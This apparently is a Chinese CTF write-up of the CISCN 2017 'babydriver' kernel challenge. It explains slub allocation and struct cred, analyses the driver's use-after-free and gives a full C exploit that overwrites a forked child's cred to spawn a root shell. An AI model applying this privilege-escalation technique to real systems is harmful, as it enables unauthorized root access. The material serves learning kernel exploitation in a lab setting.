因为课程作业里接触过uaf类型的kernel pwn，虽然当时接触的内容比较基础，但好歹算是有了一点底子，理解起来不会很吃力。这次复现的是CISCN 2017的一个kernel pwn babydriver，比较简单的UAF，但是还是有一些细节知识值得学习。

相关知识点

slub分配器

先贴张图:

简单地了解一下内核内存管理的一些简单的特点，至于更深入的代码细节可以参考“Kernel Pwn 学习之路”系列文章。

与glibc中的malloc有点相同的是，kmalloc同样需要对齐到某些特定的大小，只不过这个范围更加特殊。通过sudo cat /proc/slabinfo | grep "^kmalloc"查看可以分配的object大小。

kmalloc-8192         479    500   8192    4    8 : tunables    0    0    0 : slabdata    125    125      0
kmalloc-4096        1356   1384   4096    8    8 : tunables    0    0    0 : slabdata    173    173      0
kmalloc-2048        2322   2368   2048   16    8 : tunables    0    0    0 : slabdata    148    148      0
kmalloc-1024        6702   6720   1024   32    8 : tunables    0    0    0 : slabdata    210    210      0
kmalloc-512        30090  30464    512   64    8 : tunables    0    0    0 : slabdata    476    476      0
kmalloc-256       187245 187328    256   64    4 : tunables    0    0    0 : slabdata   2927   2927      0
kmalloc-192         5858   6174    192   42    2 : tunables    0    0    0 : slabdata    147    147      0
kmalloc-128         3304   3904    128   64    2 : tunables    0    0    0 : slabdata     61     61      0
kmalloc-96        193746 193746     96   42    1 : tunables    0    0    0 : slabdata   4613   4613      0
kmalloc-64         54702  85696     64   64    1 : tunables    0    0    0 : slabdata   1339   1339      0
kmalloc-32         14245  15744     32  128    1 : tunables    0    0    0 : slabdata    123    123      0
kmalloc-16         15616  15616     16  256    1 : tunables    0    0    0 : slabdata     61     61      0
kmalloc-8          16384  16384      8  512    1 : tunables    0    0    0 : slabdata     32     32      0

因此当需要分配一块内存的时候，chunk的大小会向上对齐到满足需求的最小的那个object size。

一般来说，kmalloc分配出来的chunk在物理地址上都是连续的，（有时会出现第一个chunk不连续的情况）。也就是说slub分配器中维护的freelist，存放一个单向链表，这个链表将该slub中空闲的object串起来，通过设置object首8 bytes（x86为4 bytes）为下一个object的指针来实现。当有chunk被kfree掉时，会相应的放在对应size的freelist头部。至于关于object的其他的各种metadata，都会维护在相应的结构体中，这里不进行深入分析。
同glibc的malloc类似，kmalloc也不会清空chunk中的原有数据。

cred结构体

linux-4.4.72的cred结构体的定义如下（其中atomic_t，kuid_t，kgid_t都是4 bytes的数据类型）：

/*
 * struct cred as defined in linux-4.4.72: the per-task record of user/group
 * IDs, capability sets and related security state.
 *
 * Layout note: when CONFIG_DEBUG_CREDENTIALS is not set, `usage` is followed
 * directly by the eight ID fields uid..fsgid. With atomic_t, kuid_t and
 * kgid_t each being 4 bytes, `usage` is at offset 0 and the ID fields span
 * offsets 4-35.
 */
struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring; /* keyring private to this process */
    struct key  *thread_keyring; /* keyring private to this thread */
    struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;  /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;  /* supplementary groups for euid/fsgid */
    struct rcu_head rcu;        /* RCU deletion hook */
};

cred结构体的作用是储存某个进程的相关信息，标志它的权限，故如果修改了进程对应的cred结构体，也就修改了这个进程的权限。

因此只要将进程的uid和gid改为0，就能达到提权的目的。

此外由于cred结构体在不同版本的kernel里，大小可能不尽相同，如果直接看源码计算它的大小可能不太方便，因此可以通过：

修改文件系统镜像rootfs.cpio解包出的init，将其中setuidgid的命令，例如：
setsid cttyhack setuidgid 1000 sh
修改为root用户:
setsid cttyhack setuidgid 0 sh
这样内核启动完，就能以root的身份登录。

编写获取cred结构体大小的简单模块，打包进文件系统镜像中，如：

// Use for get struct cred size
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/cred.h>

/*
 * Module init hook: log the size of struct cred for the kernel this module
 * was built against.
 *
 * sizeof() yields a size_t, so the value is printed with the %z length
 * modifier (hexadecimal, no 0x prefix). The size is taken from the type
 * itself, so no dummy struct cred object has to be instantiated.
 *
 * Returns 0 so that the module load succeeds.
 */
static int get_cred_size_init(void)
{
    printk(KERN_INFO "[!] Start!\n");
    printk(KERN_INFO "[+] Size of cred struct: %zx\n", sizeof(struct cred));
    return 0;
}

/* Module exit hook: only logs that the module is being unloaded. */
static void get_cred_size_exit(void)
{
    printk(KERN_INFO "[!] Exit!\n");
}

module_init(get_cred_size_init);
module_exit(get_cred_size_exit);
MODULE_LICENSE("GPL");

这样在目标系统启动后，插入模块就能获得cred结构体的大小。

fork

fork创建子进程时，子进程的用户态内存与父进程以写时复制（copy-on-write）的方式共享，但内核仍会为子进程单独分配一个新的cred结构体。因此如果父进程刚刚释放了一个与cred结构体大小相同（落在同一个kmalloc cache中）的chunk，子进程的cred结构体很可能就会复用这块刚被释放的内存，这就促成了uaf的利用。

ciscn 2017 babydriver复现

题目分析

查看保护机制：

Arch:     amd64-64-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x0)

同时从boot.sh中，查看qemu的参数，开启了smep：

-cpu kvm64,+smep

ioctl只提供了一个kmalloc的功能，为全局变量babydev_struct结构体的成员变量device_buf分配空间（事先会调用kfree先释放空间），其中size可控：

// local variable allocation has failed, the output may be wrong!
//
// ioctl handler of the driver (decompiler output).
// For command 0x10001 it frees the current babydev_struct.device_buf,
// allocates a new buffer of v4 bytes and records v4 as device_buf_len.
// Any other command is rejected.
// Returns 0 on success, 0xFFFFFFFFFFFFFFEA (-22 as a signed 64-bit value)
// otherwise.
// NOTE(review): v3 is read without ever being assigned in this listing; given
// the decompiler warning above and its rdx annotation it presumably holds
// `arg` - confirm against the disassembly.
__int64 __fastcall babyioctl(file *filp, unsigned int command, unsigned __int64 arg)
{
    size_t v3; // rdx
    size_t v4; // rbx
    __int64 result; // rax

    _fentry__(filp, *(_QWORD *)&command);
    v4 = v3;
    if ( command == 0x10001 )
    {
        // The previous buffer is released before the new one is allocated.
        kfree(babydev_struct.device_buf);
        // The allocation result is stored without a NULL check.
        babydev_struct.device_buf = (char *)_kmalloc(v4, 0x24000C0LL);
        babydev_struct.device_buf_len = v4;
        printk("alloc done\n", 0x24000C0LL);
        result = 0LL;
    }
    else
    {
        printk(&unk_2EB, v3);
        result = 0xFFFFFFFFFFFFFFEALL;
    }
    return result;
}

close的回调函数babyrelease通过kfree释放了babydev_struct->device_buf的空间：

// release (close) handler of the driver (decompiler output).
// Frees babydev_struct.device_buf, logs a message and returns 0.
// The pointer is not reset after kfree, so babydev_struct.device_buf keeps
// referring to the freed buffer.
int __fastcall babyrelease(inode *inode, file *filp)
{
    _fentry__(inode, filp);
    kfree(babydev_struct.device_buf);
    printk("device release\n", filp);
    return 0;
}

read的回调函数babyread读取babydev_struct->device_buf的内容：

// read handler of the driver (decompiler output).
// Returns -1 when babydev_struct.device_buf is NULL, -2 when device_buf_len
// is not strictly greater than v4; otherwise copies v4 bytes from device_buf
// to the user buffer and returns v4.
// NOTE(review): v4 is never assigned in this listing; its rdx annotation
// suggests it is the `length` argument - confirm against the disassembly.
ssize_t __fastcall babyread(file *filp, char *buffer, size_t length, loff_t *offset)
{
    size_t v4; // rdx
    ssize_t result; // rax
    ssize_t v6; // rbx

    _fentry__(filp, buffer);
    if ( !babydev_struct.device_buf )
        return -1LL;
    result = -2LL;
    if ( babydev_struct.device_buf_len > v4 )
    {
        v6 = v4;
        // The return value of copy_to_user is not checked.
        copy_to_user(buffer, babydev_struct.device_buf, v4);
        result = v6;
    }
    return result;
}

write的回调函数babywrite向babydev_struct->device_buf写入数据，size可控：

// write handler of the driver (decompiler output).
// Returns -1 when babydev_struct.device_buf is NULL, -2 when device_buf_len
// is not strictly greater than v4; otherwise copies v4 bytes from the user
// buffer into device_buf and returns v4.
// NOTE(review): v4 is never assigned in this listing; its rdx annotation
// suggests it is the `length` argument - confirm against the disassembly.
ssize_t __fastcall babywrite(file *filp, const char *buffer, size_t length, loff_t *offset)
{
    size_t v4; // rdx
    ssize_t result; // rax
    ssize_t v6; // rbx

    _fentry__(filp, buffer);
    if ( !babydev_struct.device_buf )
        return -1LL;
    result = -2LL;
    if ( babydev_struct.device_buf_len > v4 )
    {
        v6 = v4;
        // The return value of copy_from_user is not checked.
        copy_from_user(babydev_struct.device_buf, (char *)buffer, v4);
        result = v6;
    }
    return result;
}

利用思路

结构体babydev_struct是全局变量，因此如果开启两个设备，第二个设备kmalloc出的babydev_struct->device_buf指针会覆盖掉第一个设备的babydev_struct->device_buf（因为实际上是同一个）。因此如果close第二个设备，触发kfree操作释放掉babydev_struct->device_buf但是没有清空指针，就会造成uaf漏洞，因为此时第一个设备仍然可以操作babydev_struct->device_buf变量。
利用ioctl控制babydev_struct->device_buf的size为0xA8(sizeof(struct cred))，使得close第二个设备的时候释放一个size=0xC0的chunk到slub中。
fork一个子进程，由于子进程创建的cred结构体会从上述释放的0xC0的chunk中获得，所以第一个设备的babydev_struct->device_buf和子进程的cred同时指向一个chunk。
在子进程中调用第一个设备的write，将子进程的cred结构体中的uid和gid改为0，完成提权。
在子进程开启shell，get root shell。

exp

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
/* <stropts.h> is absent on newer glibc releases; include it only when present. */
#if defined(__has_include)
#  if __has_include(<stropts.h>)
#    include <stropts.h>
#  endif
#endif
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/stat.h>

#define COM_MALLOC 0x10001

/*
 * Exploit entry point for the babydriver use-after-free.
 *
 * Steps:
 *   1. Open /dev/babydev twice; both descriptors operate on the same global
 *      device buffer inside the driver.
 *   2. Ask the driver (COM_MALLOC) for a buffer of sizeof(struct cred) bytes.
 *   3. Close one descriptor so the driver frees the buffer while the other
 *      descriptor can still read and write it.
 *   4. fork(): the child's new cred is expected to reuse the freed chunk.
 *   5. In the child, zero the start of that chunk through the remaining
 *      descriptor and spawn a shell if the process became root.
 *
 * Returns EXIT_SUCCESS when a root shell was obtained (or, in the parent,
 * after the child has been reaped), EXIT_FAILURE when a setup step fails.
 */
int main(void)
{
    enum {
        /* sizeof(struct cred) on the target kernel */
        CRED_SIZE = 0xA8,
        /* usage (4 bytes) + uid, gid, suid, sgid, euid, egid, fsuid, fsgid (8 * 4 bytes) */
        CRED_ID_BYTES = 36
    };
    int fd_1, fd_2;
    int child;
    int status = EXIT_SUCCESS;
    char payload[CRED_ID_BYTES];

    // open the device twice
    fd_1 = open("/dev/babydev", O_RDWR);
    if (fd_1 < 0)
    {
        perror("[!] open /dev/babydev");
        return EXIT_FAILURE;
    }

    fd_2 = open("/dev/babydev", O_RDWR);
    if (fd_2 < 0)
    {
        perror("[!] open /dev/babydev");
        close(fd_1);
        return EXIT_FAILURE;
    }

    // malloc a chunk with sizeof(struct cred)
    if (ioctl(fd_1, COM_MALLOC, CRED_SIZE) < 0)
    {
        perror("[!] ioctl COM_MALLOC");
        close(fd_1);
        close(fd_2);
        return EXIT_FAILURE;
    }

    // free the chunk; the buffer is shared by both descriptors, so fd_2
    // can still reach it afterwards
    close(fd_1);

    // fork a child process
    // the cred structure of the child process will take space from the chunk just freed
    child = fork();

    // if error
    if (child < 0)
    {
        printf("[!] Fork error!\n");
        close(fd_2);
        return EXIT_FAILURE;
    }

    // child process
    if (child == 0)
    {
        // Zero every uid/gid field, not only the real IDs: the effective
        // and filesystem IDs are the ones used for permission checks.
        memset(payload, 0, sizeof(payload));
        if (write(fd_2, payload, sizeof(payload)) != (ssize_t)sizeof(payload))
        {
            perror("[!] write to /dev/babydev");
            status = EXIT_FAILURE;
        }
        else if (getuid() == 0)
        {
            printf("[+] Root!\n");
            system("/bin/sh");

            return EXIT_SUCCESS;
        }
        else
        {
            printf("[!] Still not root, the freed chunk was not reused for cred\n");
            status = EXIT_FAILURE;
        }
    }

    // parent process
    else
    {
        wait(NULL);
    }

    close(fd_2);

    return status;
}

小结

与glibc的uaf利用基本类似，只不过因为是kernel pwn，要具有多线程的思维，这点很重要，因为许多情况在单线程思维的角度中是不会发生的，但是多线程下却是可能的。
相比于调用commit_creds(prepare_kernel_cred(0));的函数调用的提权方式，直接修改cred结构体提权显得简单粗暴。
这道babydriver的题似乎还有rop绕过smep的做法，后面复现后，会补充在上篇ROP的文章里。